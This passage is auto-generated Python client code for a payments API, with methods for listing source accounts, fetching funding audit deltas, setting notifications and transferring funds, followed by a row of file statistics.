asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_accounts(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str physical_account_name: Physical Account Name
:param str payor_id: The account owner Payor ID
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page
:param str sort: List of sort fields e.g. ?sort=name:asc Default is name:asc The supported sort fields are - fundingRef
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ListSourceAccountResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_source_accounts_with_http_info(**kwargs) # noqa: E501
def get_source_accounts_with_http_info(self, **kwargs): # noqa: E501
"""Get list of source accounts # noqa: E501
List source accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_accounts_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str physical_account_name: Physical Account Name
:param str payor_id: The account owner Payor ID
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page
:param str sort: List of sort fields e.g. ?sort=name:asc Default is name:asc The supported sort fields are - fundingRef
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ListSourceAccountResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['physical_account_name', 'payor_id', 'page', 'page_size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_source_accounts" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if 'page_size' in local_var_params and local_var_params['page_size'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_source_accounts`, must be a value less than or equal to `100`") # noqa: E501
if 'page_size' in local_var_params and local_var_params['page_size'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_source_accounts`, must be a value greater than or equal to `1`") # noqa: E501
if 'sort' in local_var_params and not re.search(r'[fundingRef]+[:desc|:asc]', local_var_params['sort']): # noqa: E501
raise ApiValueError("Invalid value for parameter `sort` when calling `get_source_accounts`, must conform to the pattern `/[fundingRef]+[:desc|:asc]/`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'physical_account_name' in local_var_params:
query_params.append(('physicalAccountName', local_var_params['physical_account_name'])) # noqa: E501
if 'payor_id' in local_var_params:
query_params.append(('payorId', local_var_params['payor_id'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'page_size' in local_var_params:
query_params.append(('pageSize', local_var_params['page_size'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v1/sourceAccounts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListSourceAccountResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_source_accounts_v2(self, **kwargs): # noqa: E501
"""Get list of source accounts # noqa: E501
List source accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_accounts_v2(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str physical_account_name: Physical Account Name
:param str physical_account_id: The physical account ID
:param str payor_id: The account owner Payor ID
:param str funding_account_id: The funding account ID
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page
:param str sort: List of sort fields e.g. ?sort=name:asc Default is name:asc The supported sort fields are - fundingRef, name, balance
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ListSourceAccountResponseV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_source_accounts_v2_with_http_info(**kwargs) # noqa: E501
def get_source_accounts_v2_with_http_info(self, **kwargs): # noqa: E501
"""Get list of source accounts # noqa: E501
List source accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_accounts_v2_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str physical_account_name: Physical Account Name
:param str physical_account_id: The physical account ID
:param str payor_id: The account owner Payor ID
:param str funding_account_id: The funding account ID
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page
:param str sort: List of sort fields e.g. ?sort=name:asc Default is name:asc The supported sort fields are - fundingRef, name, balance
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ListSourceAccountResponseV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['physical_account_name', 'physical_account_id', 'payor_id', 'funding_account_id', 'page', 'page_size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_source_accounts_v2" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if 'page_size' in local_var_params and local_var_params['page_size'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_source_accounts_v2`, must be a value less than or equal to `100`") # noqa: E501
if 'page_size' in local_var_params and local_var_params['page_size'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_source_accounts_v2`, must be a value greater than or equal to `1`") # noqa: E501
if 'sort' in local_var_params and not re.search(r'[fundingRef|name|balance]+[:desc|:asc]', local_var_params['sort']): # noqa: E501
raise ApiValueError("Invalid value for parameter `sort` when calling `get_source_accounts_v2`, must conform to the pattern `/[fundingRef|name|balance]+[:desc|:asc]/`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'physical_account_name' in local_var_params:
query_params.append(('physicalAccountName', local_var_params['physical_account_name'])) # noqa: E501
if 'physical_account_id' in local_var_params:
query_params.append(('physicalAccountId', local_var_params['physical_account_id'])) # noqa: E501
if 'payor_id' in local_var_params:
query_params.append(('payorId', local_var_params['payor_id'])) # noqa: E501
if 'funding_account_id' in local_var_params:
query_params.append(('fundingAccountId', local_var_params['funding_account_id'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'page_size' in local_var_params:
query_params.append(('pageSize', local_var_params['page_size'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v2/sourceAccounts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListSourceAccountResponseV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_source_accounts_v3(self, **kwargs): # noqa: E501
"""Get list of source accounts # noqa: E501
List source accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_accounts_v3(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str physical_account_name: Physical Account Name
:param str physical_account_id: The physical account ID
:param str payor_id: The account owner Payor ID
:param str funding_account_id: The funding account ID
:param bool include_user_deleted: A filter for retrieving both active accounts and user deleted ones
:param SourceAccountType type: The type of source account.
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page
:param str sort: List of sort fields e.g. ?sort=name:asc Default is name:asc The supported sort fields are - fundingRef, name, balance
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ListSourceAccountResponseV3
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_source_accounts_v3_with_http_info(**kwargs) # noqa: E501
def get_source_accounts_v3_with_http_info(self, **kwargs): # noqa: E501
"""Get list of source accounts # noqa: E501
List source accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_accounts_v3_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str physical_account_name: Physical Account Name
:param str physical_account_id: The physical account ID
:param str payor_id: The account owner Payor ID
:param str funding_account_id: The funding account ID
:param bool include_user_deleted: A filter for retrieving both active accounts and user deleted ones
:param SourceAccountType type: The type of source account.
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page
:param str sort: List of sort fields e.g. ?sort=name:asc Default is name:asc The supported sort fields are - fundingRef, name, balance
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ListSourceAccountResponseV3, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['physical_account_name', 'physical_account_id', 'payor_id', 'funding_account_id', 'include_user_deleted', 'type', 'page', 'page_size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_source_accounts_v3" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if 'page_size' in local_var_params and local_var_params['page_size'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_source_accounts_v3`, must be a value less than or equal to `100`") # noqa: E501
if 'page_size' in local_var_params and local_var_params['page_size'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_source_accounts_v3`, must be a value greater than or equal to `1`") # noqa: E501
if 'sort' in local_var_params and not re.search(r'[fundingRef|name|balance]+[:desc|:asc]', local_var_params['sort']): # noqa: E501
raise ApiValueError("Invalid value for parameter `sort` when calling `get_source_accounts_v3`, must conform to the pattern `/[fundingRef|name|balance]+[:desc|:asc]/`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'physical_account_name' in local_var_params:
query_params.append(('physicalAccountName', local_var_params['physical_account_name'])) # noqa: E501
if 'physical_account_id' in local_var_params:
query_params.append(('physicalAccountId', local_var_params['physical_account_id'])) # noqa: E501
if 'payor_id' in local_var_params:
query_params.append(('payorId', local_var_params['payor_id'])) # noqa: E501
if 'funding_account_id' in local_var_params:
query_params.append(('fundingAccountId', local_var_params['funding_account_id'])) # noqa: E501
if 'include_user_deleted' in local_var_params:
query_params.append(('includeUserDeleted', local_var_params['include_user_deleted'])) # noqa: E501
if 'type' in local_var_params:
query_params.append(('type', local_var_params['type'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'page_size' in local_var_params:
query_params.append(('pageSize', local_var_params['page_size'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v3/sourceAccounts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListSourceAccountResponseV3', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_funding_audit_deltas(self, payor_id, updated_since, **kwargs): # noqa: E501
"""Get Funding Audit Delta # noqa: E501
Get funding audit deltas for a payor # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_funding_audit_deltas(payor_id, updated_since, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str payor_id: (required)
:param datetime updated_since: (required)
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: PageResourceFundingPayorStatusAuditResponseFundingPayorStatusAuditResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_funding_audit_deltas_with_http_info(payor_id, updated_since, **kwargs) # noqa: E501
def list_funding_audit_deltas_with_http_info(self, payor_id, updated_since, **kwargs): # noqa: E501
"""Get Funding Audit Delta # noqa: E501
Get funding audit deltas for a payor # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_funding_audit_deltas_with_http_info(payor_id, updated_since, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str payor_id: (required)
:param datetime updated_since: (required)
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(PageResourceFundingPayorStatusAuditResponseFundingPayorStatusAuditResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['payor_id', 'updated_since', 'page', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_funding_audit_deltas" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'payor_id' is set
if ('payor_id' not in local_var_params or
local_var_params['payor_id'] is None):
raise ApiValueError("Missing the required parameter `payor_id` when calling `list_funding_audit_deltas`") # noqa: E501
# verify the required parameter 'updated_since' is set
if ('updated_since' not in local_var_params or
local_var_params['updated_since'] is None):
raise ApiValueError("Missing the required parameter `updated_since` when calling `list_funding_audit_deltas`") # noqa: E501
if 'page_size' in local_var_params and local_var_params['page_size'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `list_funding_audit_deltas`, must be a value less than or equal to `100`") # noqa: E501
if 'page_size' in local_var_params and local_var_params['page_size'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `list_funding_audit_deltas`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'payor_id' in local_var_params:
query_params.append(('payorId', local_var_params['payor_id'])) # noqa: E501
if 'updated_since' in local_var_params:
query_params.append(('updatedSince', local_var_params['updated_since'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'page_size' in local_var_params:
query_params.append(('pageSize', local_var_params['page_size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v1/deltas/fundings', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageResourceFundingPayorStatusAuditResponseFundingPayorStatusAuditResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def set_notifications_request(self, source_account_id, set_notifications_request, **kwargs): # noqa: E501
"""Set notifications # noqa: E501
Set notifications for a given source account # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_notifications_request(source_account_id, set_notifications_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param SetNotificationsRequest set_notifications_request: Body to included minimum balance to set (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.set_notifications_request_with_http_info(source_account_id, set_notifications_request, **kwargs) # noqa: E501
def set_notifications_request_with_http_info(self, source_account_id, set_notifications_request, **kwargs): # noqa: E501
"""Set notifications # noqa: E501
Set notifications for a given source account # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_notifications_request_with_http_info(source_account_id, set_notifications_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param SetNotificationsRequest set_notifications_request: Body to included minimum balance to set (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['source_account_id', 'set_notifications_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method set_notifications_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `set_notifications_request`") # noqa: E501
# verify the required parameter 'set_notifications_request' is set
if ('set_notifications_request' not in local_var_params or
local_var_params['set_notifications_request'] is None):
raise ApiValueError("Missing the required parameter `set_notifications_request` when calling `set_notifications_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'set_notifications_request' in local_var_params:
body_params = local_var_params['set_notifications_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v1/sourceAccounts/{sourceAccountId}/notifications', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def transfer_funds(self, source_account_id, transfer_request, **kwargs): # noqa: E501
"""Transfer Funds between source accounts # noqa: E501
Transfer funds between source accounts for a Payor. The 'from' source account is identified in the URL, and is the account which will be debited. The 'to' (destination) source account is in the body, and is the account which will be credited. Both source accounts must belong to the same Payor. There must be sufficient balance in the 'from' source account, otherwise the transfer attempt will fail. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.transfer_funds(source_account_id, transfer_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: The 'from' source account id, which will be debited (required)
:param TransferRequest transfer_request: Body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.transfer_funds_with_http_info(source_account_id, transfer_request, **kwargs) # noqa: E501
def transfer_funds_with_http_info(self, source_account_id, transfer_request, **kwargs): # noqa: E501
"""Transfer Funds between source accounts # noqa: E501
Transfer funds between source accounts for a Payor. The 'from' source account is identified in the URL, and is the account which will be debited. The 'to' (destination) source account is in the body, and is the account which will be credited. Both source accounts must belong to the same Payor. There must be sufficient balance in the 'from' source account, otherwise the transfer attempt will fail. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.transfer_funds_with_http_info(source_account_id, transfer_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: The 'from' source account id, which will be debited (required)
:param TransferRequest transfer_request: Body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['source_account_id', 'transfer_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method transfer_funds" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `transfer_funds`") # noqa: E501
# verify the required parameter 'transfer_request' is set
if ('transfer_request' not in local_var_params or
local_var_params['transfer_request'] is None):
raise ApiValueError("Missing the required parameter `transfer_request` when calling `transfer_funds`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'transfer_request' in local_var_params:
body_params = local_var_params['transfer_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v2/sourceAccounts/{sourceAccountId}/transfers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def transfer_funds_v3(self, source_account_id, transfer_request2, **kwargs): # noqa: E501
"""Transfer Funds between source accounts # noqa: E501
Transfer funds between source accounts for a Payor. The 'from' source account is identified in the URL, and is the account which will be debited. The 'to' (destination) source account is in the body, and is the account which will be credited. Both source accounts must belong to the same Payor. There must be sufficient balance in the 'from' source account, otherwise the transfer attempt will fail. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.transfer_funds_v3(source_account_id, transfer_request2, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: The 'from' source account id, which will be debited (required)
:param TransferRequest2 transfer_request2: Body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.transfer_funds_v3_with_http_info(source_account_id, transfer_request2, **kwargs) # noqa: E501
def transfer_funds_v3_with_http_info(self, source_account_id, transfer_request2, **kwargs): # noqa: E501
"""Transfer Funds between source accounts # noqa: E501
Transfer funds between source accounts for a Payor. The 'from' source account is identified in the URL, and is the account which will be debited. The 'to' (destination) source account is in the body, and is the account which will be credited. Both source accounts must belong to the same Payor. There must be sufficient balance in the 'from' source account, otherwise the transfer attempt will fail. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.transfer_funds_v3_with_http_info(source_account_id, transfer_request2, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: The 'from' source account id, which will be debited (required)
:param TransferRequest2 transfer_request2: Body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['source_account_id', 'transfer_request2'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method transfer_funds_v3" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `transfer_funds_v3`") # noqa: E501
# verify the required parameter 'transfer_request2' is set
if ('transfer_request2' not in local_var_params or
local_var_params['transfer_request2'] is None):
raise ApiValueError("Missing the required parameter `transfer_request2` when calling `transfer_funds_v3`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'transfer_request2' in local_var_params:
body_params = local_var_params['transfer_request2']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v3/sourceAccounts/{sourceAccountId}/transfers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 53.57685 | 4,651 | 0.638082 | 13,464 | 112,940 | 5.104575 | 0.037062 | 0.041904 | 0.066407 | 0.022116 | 0.923888 | 0.91769 | 0.912743 | 0.905206 | 0.899924 | 0.893813 | 0 | 0.018773 | 0.288286 | 112,940 | 2,107 | 4,652 | 53.602278 | 0.836242 | 0.475713 | 0 | 0.778238 | 0 | 0.017617 | 0.246453 | 0.068215 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036269 | false | 0 | 0.005181 | 0 | 0.07772 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
